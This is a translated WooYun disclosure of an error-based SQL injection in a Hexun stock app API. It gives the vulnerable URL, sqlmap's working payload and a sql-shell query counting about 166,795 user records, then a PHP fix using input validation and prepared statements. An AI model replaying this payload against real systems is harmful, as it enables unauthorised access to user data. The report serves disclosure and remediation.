Vulnerability Summary
Defect ID: wooyun-2015-0141261
Title: SQL injection in an API of a Hexun Finance app exposes account information of several hundred thousand users
Vendor: Hexun.com (和讯网)
Author: 路人甲
Submitted: 2015-09-15 13:30
Fixed: 2015-10-30 13:48
Published: 2015-10-30 13:48
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 18
Status: Confirmed by vendor
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2015-09-15: Details sent to the vendor, awaiting vendor handling
2015-09-15: Vendor confirmed the issue; details disclosed to the vendor only
2015-09-25: Details disclosed to core white hats and domain experts
2015-10-05: Details disclosed to regular white hats
2015-10-15: Details disclosed to intern white hats
2015-10-30: Details disclosed to the public
Brief description:
MySQL error-based injection that exposes a large amount of user information.
Details:
The injection point is in the Hexun Stocks app, at the following URL:
http://mtrack.hexun.com/track/hcstock.php?task=registeruser&userid=25863150&username=mail98318187&deviceuid=355136055562691&devicetoken=03551360555626910000001034000001&status=active&pushbadge=enabled
The username parameter is injectable. It is a straightforward error-based injection, quick and convenient to use, and this endpoint clearly touches the database holding user data.
Proof of vulnerability:
sqlmap output:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: username (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: task=registeruser&userid=25863150&username=mail98318187' AND (SELECT 7125 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,(SELECT (CASE WHEN (7125=7125) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NzpX'='NzpX&deviceuid=355136055562691&devicetoken=03551360555626910000001034000001&status=active&pushbadge=enabled
---
[04:34:18] [INFO] testing MySQL
[04:34:18] [INFO] confirming MySQL
[04:34:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[04:34:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select count(*) from hx_users
[04:34:33] [INFO] fetching SQL SELECT statement query output: 'select count(*) from hx_users'
[04:34:33] [INFO] heuristics detected web page charset 'ascii'
[04:34:33] [WARNING] reflective value(s) found and filtering out
[04:34:33] [INFO] retrieved: 166795
select count(*) from hx_users: '166795'
sql-shell>
Suggested fix:
Validate the input and use parameterized queries.
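As an added illustration of that fix (this is not Hexun's code and the table and column names hx_users, username and deviceuid are assumptions), the block below shows the string-splicing pattern that error-based injection relies on next to a hardened handler that whitelists the username format and binds it as a prepared-statement parameter. The demo runs against an in-memory SQLite database as a stand-in for MySQL; the comments note the MySQL-specific PDO options.

```php
<?php
// Added example, not the vendor's code. Schema names are assumed.
declare(strict_types=1);

// Vulnerable pattern: the user-controlled value is spliced into SQL text, so a
// single quote in $username closes the string literal and the rest of the value
// is parsed as SQL. When the handler also echoes the MySQL error message, that
// message becomes the data channel sqlmap's error-based technique reads from.
function buildLookupUnsafe(string $username): string
{
    return "SELECT userid FROM hx_users WHERE username = '" . $username . "'";
}

// Hardened step 1: reject anything outside the expected format. Rejecting is
// safer than stripping quotes, because a filter that removes one metacharacter
// usually leaves another one behind.
function isValidUsername(string $username): bool
{
    // Assumed policy: 3 to 32 characters of letters, digits, underscore, dot, hyphen.
    return preg_match('/^[A-Za-z0-9._-]{3,32}$/', $username) === 1;
}

// Hardened step 2: send the value as a bound parameter, never as SQL text.
// Returns the new user id, or null when the input is rejected.
function registerUser(PDO $db, string $username, string $deviceUid): ?int
{
    if (!isValidUsername($username)) {
        return null;
    }

    try {
        $stmt = $db->prepare(
            'INSERT INTO hx_users (username, deviceuid) VALUES (:username, :deviceuid)'
        );
        $stmt->execute([':username' => $username, ':deviceuid' => $deviceUid]);
        return (int) $db->lastInsertId();
    } catch (PDOException $e) {
        // Log server-side; never return the driver's error text to the client.
        error_log('registerUser failed: ' . $e->getMessage());
        return null;
    }
}

// Demo with SQLite. For MySQL, construct PDO with
//   [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
// so statements are prepared natively on the server.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE hx_users (userid INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT UNIQUE, deviceuid TEXT)');

$benign  = 'mail98318187';          // constructed sample, same shape as the report's value
$hostile = "mail98318187' OR '1'='1"; // constructed sample containing a quote

// The unsafe builder shows the literal being broken out of:
echo buildLookupUnsafe($hostile), PHP_EOL;

// The hardened handler accepts the benign value and rejects the hostile one
// before any SQL is built.
var_dump(registerUser($db, $benign, '355136055562691'));  // int(1)
var_dump(registerUser($db, $hostile, '355136055562691')); // NULL
```

The format check is a defence-in-depth layer; the prepared statement is the actual fix, since a bound parameter cannot change the statement's structure regardless of its content.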
Copyright notice: when reproducing, please credit the source: 路人甲@WooYun
Vulnerability Response
Vendor response:
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-09-15 13:46
Vendor reply:
Thank you, in progress.
Latest status:
None